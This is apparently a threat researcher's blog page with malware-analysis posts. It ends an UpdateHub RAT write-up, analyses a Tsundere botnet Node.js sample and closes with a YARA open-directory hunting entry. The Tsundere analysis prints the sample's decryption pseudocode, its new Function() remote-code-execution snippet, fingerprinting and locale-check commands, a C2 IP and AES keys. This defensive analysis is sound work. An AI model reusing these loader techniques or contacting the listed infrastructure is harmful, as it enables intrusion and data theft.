  • HTA-based delivery

  • USB LNK worm spreading

  • Crypto wallet detection (hardware wallets)

  • Extensive AD reconnaissance

  • CrowdStrike Falcon evasion

  • Custom XOR-encrypted C2 protocol

5. JWT-Based Authentication

The use of JWT tokens for C2 session authentication is relatively sophisticated for HTA-based malware.

Attribution Assessment

Possible Origins:

  1. Cybercriminal Operation (Most Likely)

  • Financially motivated (crypto wallet focus)

  • Uses commodity techniques (copied USB worm code)

  • Brazilian C2 infrastructure hint (meusitehostgator.com.br in first sample)

  • No nation-state indicators

  1. Evolution of Aggah/Gorgon Tools

  • Similar infection chain

  • Could be same actors with new infrastructure

  • Different final payload suggests possible code sharing

  1. Commercial Malware-as-a-Service

  • Version numbering suggests ongoing development (v3.3)

  • Multiple download fallbacks suggest testing

  • Task-based modular design

YARA Rule Matching Results

Rules vs Known Families:

The generic rule would also match Aggah and KimJongRAT samples. The detailed rule is specific to UpdateHub and should not false-positive on other families.

Recommendations for Hunting

Search Terms for Existing Intel:

  1. VirusTotal Intelligence:
    content:”updatehub” OR content:”GoogleTaskSystem136" OR
    content:”PT30M” AND content:”P3650D” AND content:”Schedule.Service”

  2. MalwareBazaar:

  • Tag: hta, crypto-stealer, usb-worm

  • Signature: Scheduled task with “Google” impersonation

  1. MISP/OpenCTI:

  • Search for C2: *-updatehub.cc

  • Search for similar HWID patterns

  1. Passive DNS:

  • Query: s?-updatehub.cc (where ? = 0–10)

  • Historical resolution data may reveal infrastructure

Conclusion

UpdateHub RAT appears to be a newly documented threat that combines techniques from multiple known malware families:

  • Infection chain resembles Aggah campaign

  • USB worm copied from Spora/Gamarue techniques

  • Crypto targeting similar to modern stealers like KimJongRAT

  • Custom C2 protocol with JWT authentication is unique

The malware should be tracked as a distinct family pending discovery of direct code overlaps with known campaigns. The YARA rules provided should help identify related samples in threat intelligence platforms.

References

  1. Unit42 — Aggah Campaign Analysis

  2. G DATA — Spora Ransomware Worm Analysis

  3. Unit42 — KimJongRAT Stealer Variant

  4. Microsoft — StilachiRAT Analysis

  5. Moonlock — Anti-Ledger Malware Campaign

  6. HP Wolf Security — Aggah Campaign Cryptocurrency Stealer

16. Conclusion

This HTA malware represents a professionally developed multi-stage loader and infostealer with the following characteristics:

  • Strong Evasion: Multiple download methods, hidden execution, security product detection, C2 dependency

  • Corporate Targeting: Extensive AD reconnaissance suggests enterprise environment focus

  • Cryptocurrency Focus: Specific wallet detection for theft operations

  • Self-Propagation: USB spreading via LNK replacement technique

  • Modular Design: Task-based C2 allows flexible payload deployment

The sophistication level and feature set suggest this is likely part of a commercial malware kit or organized threat actor operation targeting both financial (cryptocurrency) and corporate assets. The C2 dependency serves as both an anti-analysis mechanism and a kill switch, preventing execution in isolated analysis environments.

Read More
August van sickle August van sickle

Tsundere Botnet — Node.js Binary

It all begins with an idea.

The Tsundere botnet, identified by Kaspersky Global Research and Analysis Team (GReAT) in July 2025, represents a sophisticated evolution in cross-platform malware campaigns orchestrated by a Russian-speaking threat actor known as “koneko.” Initially surfacing through a 2024 npm supply-chain attack involving 287 typosquatted Node.js packages, Tsundere has matured into an actively expanding botnet primarily targeting Windows systems. Leveraging blockchain technology for command-and-control (C2) resilience, it enables dynamic execution of arbitrary JavaScript payloads, posing risks of data exfiltration, cryptocurrency theft, and further compromise.

Note: I analyzed this sample on my own, after my analysis I identified the malware as being Tsundre Botnet, based on the activity Kaspersky reported on here: The Tsundere botnet uses the Ethereum blockchain to infect its targets | Securelist. I will be reviewing IOC’s and if the ones I observed are still consistent with what was previously reported.

SHA256: 16e0dbcc6670e7722f68620b6f305e2c4433ed6f7b25174a75480ed5c4b4fe42



This hash was initially reported yesterday, December 3, 2025, and there was no real indicators that this was malicious. Comments also reflected one person believing that this was a benign binary based on analysis from an automated sandbox.

Press enter or click to view image in full size

Sample.js

This JavaScript (JS) code is pretty heavily obfuscated. The obfuscation combines string encryption, control flow flattening, identifier mangling, and runtime decryption, making it challenging to analyze without deobfuscation tools or manual unpacking.

String Obfuscation via Custom Base64 + RC4 Decryption:

Nearly all strings (e.g., URLs, function names, console messages) are stored in encrypted arrays and decrypted at runtime using a hybrid Base64 decoder followed by an RC4 (ARC4) stream cipher. This prevents static string-based signatures (e.g., YARA rules) from triggering.

Implementation Details:

  • The core decoder is defined in the _0x2905 function (lines ~1–50). It initializes an RC4 key schedule using a user-provided key (_0x3495d6).

  • Step 1: Base64-like decoding. A mangled Base64 alphabet (‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=’) decodes input into a URI-encoded string (e.g., %XX format), then decodeURIComponent expands it.

  • Step 2: RC4 decryption. The decoded string is fed into an RC4 keystream generator

// Simplified pseudocode from _0x2905['SbIfNX']
for (let i = 0; i < 256; i++) sbox[i] = i;  // Initialize S-box
j = 0;
for (let i = 0; i < 256; i++) {
  j = (j + sbox[i] + key.charCodeAt(i % key.length)) % 256;
  swap sbox[i] and sbox[j];
}
// Keystream XOR with plaintext
for (let i = 0; i < plaintext.length; i++) {
  i_idx = (i + 1) % 256;
  j = (j + sbox[i_idx]) % 256;
  swap sbox[i_idx] and sbox[j];
  k = sbox[(sbox[i_idx] + sbox[j]) % 256];
  output += String.fromCharCode(plaintext.charCodeAt(i) ^ k);
}

Identifier Mangling with Hexadecimal Names

All variables, functions, and properties use randomized hexadecimal prefixes (e.g., _0x2905, _0x381842, _0x4f8a99). This is generated by tools like javascript-obfuscator, renaming ~90% of identifiers to meaningless shorts.

Implementation Details:

  • Functions like _0x4f8a() return the string array.

  • Nested helpers (e.g., _0x56f881(_0x575caf — -0xf5, _0x3c7903) ) compute indices via arithmetic offsets (e.g., arg — 0x17b).

  • Multiple layers: Outer _0x2905, inner _0x232dae, _0x5cb090, each with its own array and offset math.

Control Flow Flattening with While-Try-Catch Loops

Linear code is “flattened” into opaque predicates — while loops that shift/rotate an array until a computed checksum matches a magic value. This disrupts disassemblers and adds anti-debugging (e.g., infinite loops if tampered).

while(!![]){  // Infinite loop
  try {
    const _0x1b1805 = parseInt(_0x56f881(0x238, ...)) / 1 + ...;  // Compute sum of obfuscated ints
    if (_0x1b1805 === _0xad14cc) break;  // Magic: 0x704f6 (~458086)
    else _0x596a8d['push'](_0x596a8d['shift']());  // Rotate array
  } catch { _0x596a8d['push'](_0x596a8d['shift']()); }
}

Multi-Layered Obfuscation and Runtime Code Execution

Obfuscation is nested (e.g., _0x2905 calls _0x232dae, which calls _0x5cb090). Dynamic new Function() executes decrypted payloads, enabling further evasion.

Implementation Details:

  • Layers: 4+ decoders (_0x2905, _0x232dae, _0x5cb090, _0x31de0e). Each has its own array (e.g., _0x41cd62 with 70+ hex keys).

  • Runtime Eval: In onMessage (lines ~600+), decrypts incoming WebSocket data, then

const _0x33324b = new Function('require', 'global', ..., decrypted_code);
_0x33324b(require, global, ...);  // Executes arbitrary JS
  • Payloads include overrides like global.serverSend for C2 callbacks.

  • AES Encryption: Outbound/inbound messages use AES-256-CBC (crypto module) with runtime keys/IVs (16-byte IV check).

Anti-Analysis and Evasion Techniques

  • Dynamic Imports: require(‘ws’), require(‘crypto’), require(‘os’), require(‘ethers’) — delays footprint.

  • Error Handling: Broad try-catch swallows exceptions, logging minimally

  • Timing/Polling: Ping-pong over WebSocket (30s interval), reconnects on failure (15s timeout).

  • Platform-Specific: Windows-focused (e.g., wmic queries for UUID, GPU via PowerShell). Collects sysinfo (MAC, BIOS, volume serial) hashed into UUID.

System Fingerprinting

The malware collects victim data:

  • Username (os.userInfo())

  • Hostname (os.hostname())

  • Platform/Architecture

  • CPU information

  • GPU information (WMI: Win32_VideoController)

  • MAC Address (first non-internal interface)

  • Total Memory

  • Node.js Version

  • Windows Edition (WMI: Win32_OperatingSystem)

  • Volume Serial Number (vol command)

  • BIOS Information (WMI: SystemBIOS)

  • System UUID (Registry: MachineGuid)

All data is hashed (SHA256) to create a unique userId in UUID format.

Press enter or click to view image in full size

Connections and Host Enumeration

CIS Country Kill Switch (Ukraine being an exception)

  • hy (Armenian)

  • hy-AM (Armenian — Armenia)

  • az (Azerbaijani)

  • be (Belarusian)

  • be-BY (Belarusian — Belarus)

  • kk (Kazakh)

  • ky (Kyrgyz)

  • ky-KG (Kyrgyz — Kyrgyzstan)

  • ru (Russian)

  • ru-RU (Russian — Russia)

  • ru-BY (Russian — Belarus)

  • ru-KG (Russian — Kyrgyzstan)

  • ru-MD (Russian — Moldova)

  • ru-UA (Russian — Ukraine)

  • tg (Tajik)

  • uk (Ukrainian)

  • uk-UA (Ukrainian — Ukraine)

  • uz (Uzbek)

Remote Code Exection (RCE)

When receiving a message with id=1, the malware:

1. Creates a new Function() with the received code

2. Provides access to: require, global, console

3. Executes the code in a try-catch wrapper

4. Sends results back via serverSend() callback

This allows the C2 server to push arbitrary Node.js code for execution.

Registry Queries:

  • HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid (System UUID)

  • HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation\SystemBIOSVersion

When I execute the JS binary in cmd.exe:

Press enter or click to view image in full size

We see it making connections to RPC at multiple different Ethereum Wallet Endpoints. It also gathers host enumeration details as defined earlier in the code review.

The Process Tree:

Press enter or click to view image in full size

Process Tree Breakdown

node.exe (8072)
├── “C:\Program Files\nodejs\node.exe” …16e0dbcc6670e7722f68620b6f305e2c4433ed6f7b25174a75480ed5c4b4fe42.js

├── cmd.exe (3812) → powershell.exe “[System.Globalization.CultureInfo]::InstalledUICulture.Name”
│ └── [CIS LOCALE CHECK — Kill Switch]

├── cmd.exe (7164) → powershell.exe “Get-WmiObject Win32_VideoController | Select-Object -ExpandProperty Name”
│ └── [GPU FINGERPRINTING]

├── cmd.exe (7252) → reg query “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion” /v ProductName
│ └── [WINDOWS EDITION]

├── reg.exe (4356) → reg query “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion” /v ProductName
│ └── [WINDOWS EDITION — direct call]

├── cmd.exe (4440) → cmd.exe /d /s /c “vol”
│ └── [VOLUME SERIAL NUMBER]

├── cmd.exe (7008) → reg query “HKLM\HARDWARE\DESCRIPTION\System\BIOS”
│ └── [BIOS FINGERPRINTING]

├── reg.exe (8068) → reg query “HKLM\HARDWARE\DESCRIPTION\System\BIOS”
│ └── [BIOS — direct call]

├── cmd.exe (832) → reg query “HKLM\SOFTWARE\Microsoft\Cryptography” /v MachineGuid
│ └── [SYSTEM UUID — Unique identifier]

├── reg.exe (7432) → reg query “HKLM\SOFTWARE\Microsoft\Cryptography” /v MachineGuid
│ └── [SYSTEM UUID — direct call]

├── cmd.exe (1496) → powershell.exe “[System.Globalization.CultureInfo]::InstalledUICulture.Name”
│ └── [SECOND LOCALE CHECK — possibly in reconnect loop]

└── powershell.exe (4) → “[System.Globalization.CultureInfo]::InstalledUICulture.Name”
└── [THIRD LOCALE CHECK]

DNS Query to one of the Ethereum Wallet Endpoints

DNS Query to a second Ethereum Wallet Endpoint

Shodan

Example of the Websocket Handshake Get Request:

CLIENT REQUEST:

— — — — — — — -

GET / HTTP/1.1

Sec-WebSocket-Version: 13

Sec-WebSocket-Key: gcG7wVAmx5B2IhtwTdv9WQ==

Connection: Upgrade

Upgrade: websocket

Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits

Host: 193.24.123.68:3011

Traffic Flow Summary:

  • 13808 551.95 →C2 227 WebSocket handshake request

  • 13815 552.12 ←C2 129 101 Switching Protocols

  • 13816 552.12 ←C2 34 AES-256 Key (binary)

  • 13818 552.13 →C2 6 ACK

  • 13822 552.29 ←C2 18 AES IV (binary)

  • 13923 553.41 →C2 520 Encrypted victim fingerprint

  • 13997 553.63 ←C2 50 Encrypted ack: “Connected”

IOCs

Network:

  • 193.24.123.68:3011 (WebSocket C2)

  • rpc.flashbots.net (Ethereum RPC)

  • rpc.mevblocker.io (Ethereum RPC)

  • eth.llamarpc.com (Ethereum RPC)

  • eth.merkle.io (Ethereum RPC)

  • eth.drpc.org (Ethereum RPC)

Also, these are all new IOC’s compared to the Kaspersky report:


Encryption

  • AES Key: e5f4e1b5d1065b0ecd6b3ef972d451e1c63ecd8da4d73b82cf429d70d13d166f

  • AES IV: 4e3d21a0941bb92632c4997fd4a582b1

Thank you! Critque welcome and appreciated!

August Vansickle


Twitter: @LunchM0n3ey9090

Linkedin: August Vansickle | LinkedIn

References:

The Tsundere botnet uses the Ethereum blockchain to infect its targets | Securelist

Read More
August van sickle August van sickle

100 Days of Yara - Day 15 2025

It all begins with an idea.

Day 15

#100DaysOfYara Day 15

So today, I went hunting on my own through open dir’s to find some spicy binaries.

Heres a resource to learn about open dir hunting using censysy: https://censys.com/a-beginners-guide-to-hunting-open-directories/

The one I looted from, I grabbed a file called excel-https.exe. Part of the reason that interested me, is that file naming convention is typical of C2 implants, esp for ex, Cobalt Strike.

The binary was a PE32, had a lot of socket calls, and functionality, it had metadata that indicated it was an Apache tool used for load testing — ApacheBench: https://censys.com/a-beginners-guide-to-hunting-open-directories/

So I almost gave up, but there were calls for retrieving process ID’s, getting handles on processes, etc and Apache Bench is only testing web apps for load.

and, there was a hardcoded IP, which I visited and is the open dir I found in the first place.

So heres my Rule:

https://github.com/augustvansickle/2025_100DaysofYara/blob/76aaaa87796ef90fc5b3b8dba665c6b539a9d68e/Day15_OpenDir_HTTP_Beacon_PE.yar

Read More